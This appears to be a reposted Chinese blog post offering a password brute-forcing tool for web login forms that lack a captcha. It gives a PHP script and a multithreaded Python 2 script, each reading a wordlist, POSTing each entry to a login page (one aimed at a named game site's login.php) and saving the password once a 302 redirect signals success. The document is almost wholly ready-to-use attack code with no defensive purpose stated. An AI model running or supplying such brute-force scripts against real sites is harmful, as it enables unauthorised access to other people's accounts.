无验证码web爆破工具
转自:Return Blogs: www.creturn.com
PHP版本
<?php
set_time_limit(0);
$pwd = 'password/pwdt.txt'; //密码文件
$rhost = 'http://127.0.0.1/test/test.php'; //POST数据地址
$file = fopen($pwd, 'r');//初始化文件句柄
$curl = curl_init();//初始化
//设置参数
curl_setopt($curl, CURLOPT_URL, $rhost);//设置目标地址
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);//设置接收反馈内容
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_POST, 1);//设置提交方式为POST
while (!feof($file)){
$fpwd = trim(fgets($file));
$post_data = array('password'=>$fpwd); //POST提交数据
curl_setopt($curl, CURLOPT_POSTFIELDS, $post_data);
//执行提交内容
curl_exec($curl);
//获取状态反馈信息组
$rsinfo = curl_getinfo($curl);
if(intval($rsinfo['http_code'])== 302){
file_put_contents('pwd.txt', $fpwd);
echo '密码是:'.$fpwd.'已经保存到pwd.txt文件中';
return ;
}
}
//关闭资源接口
curl_close($curl);
//关闭文件句柄释放资源
fclose($file);
Python 模拟多线程版本:
#/usr/bin python
# -*- coding: utf-8-*-
# create data:2012.6.20 By:Return
import httplib,urllib
import threading
import Queue
queue=Queue.Queue() #创建任务队列
class ThreadUrl(threading.Thread):
def __init__(self,queue):
threading.Thread.__init__(self)
self.queue=queue
def run(self):
while True:
try:
if(Queue.Empty):
pwd=self.queue.get() #从队列中获取密码
else:
break
params = urllib.urlencode({'password':pwd}) #提交的数据
headers = {"Content-Type":"application/x-www-form-urlencoded",
"Connection":"Keep-Alive"}
#HTTP连接建立,连接地址为你要爆破的目标地址
conn = httplib.HTTPConnection('game.creturn.net')
# url参数为要爆破提交的POST地址
conn.request(method="POST",url='/login.php',body=params,headers=headers)
response = conn.getresponse()
if response.status == 302:
final="crack success!^_^! Password: %s"%(pwd)
fp = open('rs.txt','a+');
fp.write(final); #如果破解成则忘文件rs.txt写入密码
fp.close();
else:
conn.close();
except:
print 'connect time out!'
self.queue.task_done()
def main():
print 'Now is creaking....';
for i in range(15):
t=ThreadUrl(queue)
t.setDaemon(True)
t.start()
pwds = open('pwd2.txt','r').readlines(); #读取密码文件
for pwd in pwds:
p=pwd
queue.put(p)
queue.join()
if __name__ == '__main__':
main()